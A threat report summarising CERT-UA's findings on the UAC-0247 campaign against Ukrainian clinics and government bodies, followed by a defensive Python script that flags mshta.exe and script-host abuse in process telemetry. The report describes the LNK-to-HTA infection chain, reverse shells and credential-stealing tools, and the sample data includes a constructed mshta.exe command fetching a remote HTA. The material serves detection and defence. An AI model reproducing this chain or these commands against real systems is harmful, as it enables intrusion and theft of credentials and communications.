UAC-0247 Malware Campaign Targets Ukrainian Clinics And Government Entities In Data Theft Operation

The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of a malware campaign attributed to a threat cluster tracked as UAC-0247. The activity, observed between March and April 2026, has primarily targeted government entities and municipal healthcare institutions, including clinics and emergency hospitals. The operation deploys malware capable of stealing sensitive data from Chromium-based web browsers and from WhatsApp, raising concerns over the exposure of administrative and personal communications within the affected organizations.

According to the findings, the attack chain begins with a phishing email presented as a humanitarian aid proposal. The message urges recipients to click a link that leads either to a legitimate website compromised through a cross-site scripting vulnerability or to a fake website built with the help of AI tools. Whichever landing page is used, the goal is the same: trick the user into downloading and running a Windows shortcut (LNK) file. The shortcut launches a remote HTML Application (HTA) through the native Windows utility mshta.exe. Once running, the HTA displays a decoy form to hold the victim's attention while it retrieves a binary that injects shellcode into legitimate system processes such as RuntimeBroker.exe.

Further analysis reveals a two-stage loader. The second stage is implemented in a proprietary executable format that supports code and data sections, function imports from dynamic libraries, and relocations; the final payload is additionally compressed and encrypted to evade detection. One of the initial stagers identified in the campaign is a simple TCP reverse shell, along with a variant tracked as RAVENSHELL, which opens a TCP connection to a remote server and lets the operator run commands on the infected host through cmd.exe. Alongside these, the attackers have deployed additional components such as AGINGFLY and a PowerShell-based script known as SILENTLOOP. SILENTLOOP can execute commands, update its own configuration automatically, and retrieve command-and-control (C2) server IP addresses from Telegram channels, with fallback mechanisms for alternative connection paths.

AGINGFLY, written in C#, provides remote control of the system over a WebSocket connection to a C2 server. It lets the attackers execute system commands, activate keylogging, download additional files, and deploy further payloads on compromised hosts. Investigations covering roughly a dozen incidents indicate that the campaign focuses on reconnaissance, lateral movement across networks, and credential theft from WhatsApp and Chromium-based browsers. For this the operators rely on a set of open-source tools: ChromElevator, which bypasses Chromium's app-bound encryption to extract cookies and saved passwords; ZAPiXDESK for decrypting WhatsApp Web databases; RustScan for network scanning; Ligolo-ng for tunneling reverse TCP and TLS connections; and Chisel for traffic tunneling. XMRig, a cryptocurrency miner, was also deployed.

The investigation also found evidence that members of the Defense Forces of Ukraine may have been targeted, with malicious ZIP archives distributed over Signal. These archives deploy AGINGFLY through DLL side-loading. To reduce exposure, CERT-UA recommends restricting the execution of LNK, HTA, and JS files and limiting the use of utilities such as mshta.exe, powershell.exe, and wscript.exe in controlled environments, shrinking the attack surface and breaking the execution chain described above.
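The execution chain described earlier (a shortcut launching mshta.exe against a remote HTA, a script host running a downloaded lure) and the restrictions CERT-UA recommends both map directly onto process-creation telemetry. The Python triage routine below is an added example, not code from CERT-UA or from this article. It runs over a constructed list of Sysmon Event ID 1-style records; the field names (image, parent_image, command_line), paths, hostnames and user names are all assumed for illustration. It flags mshta.exe handed a remote URL, restricted script hosts spawned by explorer.exe (what a user double-clicking a shortcut looks like in telemetry), and script hosts executing files from user-writable directories.

```python
"""Triage Windows process-creation events for the shortcut -> mshta.exe chain.

Added example, not CERT-UA's or the article's code. Field names, paths,
hostnames and user names below are constructed for illustration.
"""
import re
from typing import Dict, List

# Remote resource handed to a script host, e.g. mshta.exe https://host/x.hta
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)

# Script-type files launched from directories an unprivileged user can write to.
SCRIPT_IN_USER_DIR = re.compile(
    r'\\(?:Downloads|Temp|AppData)\\[^"]*?\.(?:hta|js|jse|vbs|wsf|lnk)\b',
    re.IGNORECASE,
)

# Script hosts the advisory recommends restricting, plus close relatives.
RESTRICTED_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# A user double-clicking a shortcut yields explorer.exe as the parent process.
INTERACTIVE_PARENTS = {"explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event: Dict[str, str]) -> List[str]:
    """Return the ordered list of rule names that fire for one event."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["command_line"]
    findings: List[str] = []

    # Rule 1: mshta.exe fetching an HTA over the network (remote HTA execution).
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        findings.append("mshta_remote_hta")

    # Rule 2: a restricted script host started directly from the desktop shell,
    # which is what a user-launched LNK looks like in process telemetry.
    if image in RESTRICTED_HOSTS and parent in INTERACTIVE_PARENTS:
        findings.append("lolbin_from_shell")

    # Rule 3: a script host running a script file from Downloads/Temp/AppData,
    # the landing spot for a file the victim was tricked into saving.
    if image in RESTRICTED_HOSTS and SCRIPT_IN_USER_DIR.search(cmd):
        findings.append("script_from_user_dir")

    return findings


def triage_all(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> findings, keeping only events that fired a rule."""
    hits: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        findings = triage(event)
        if findings:
            hits[i] = findings
    return hits


# Constructed sample telemetry; user, host and path names are made up.
EVENTS: List[Dict[str, str]] = [
    {   # shortcut click -> mshta.exe pulling a remote HTA (the article's chain)
        "image": r"C:\Windows\System32\mshta.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'"C:\Windows\System32\mshta.exe" https://aid-proposal.invalid/form.hta',
    },
    {   # ordinary COM broker start; the process the shellcode later targets
        "image": r"C:\Windows\System32\RuntimeBroker.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r"C:\Windows\System32\RuntimeBroker.exe -Embedding",
    },
    {   # scheduled admin script: restricted host, but benign parent and path
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1",
    },
    {   # user runs a downloaded .js lure through wscript.exe
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\olena\Downloads\humanitarian_aid.js"',
    },
]

if __name__ == "__main__":
    for idx, rules in triage_all(EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}  <- {EVENTS[idx]['command_line']}")
```

The third sample shows why the rules key on parent and path rather than on the binary alone: an administrator's scheduled PowerShell job trips nothing, while the same host started from explorer.exe with a file in Downloads does. Process injection into RuntimeBroker.exe is not visible in process-creation events at all; on a host where the first rule fires, Sysmon Event ID 8 (CreateRemoteThread) or 10 (ProcessAccess) from the mshta.exe lineage is the next pivot. The same rule set also shows what the recommended restrictions buy: a policy that blocks mshta.exe and wscript.exe for ordinary users removes the first two findings before they can occur.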
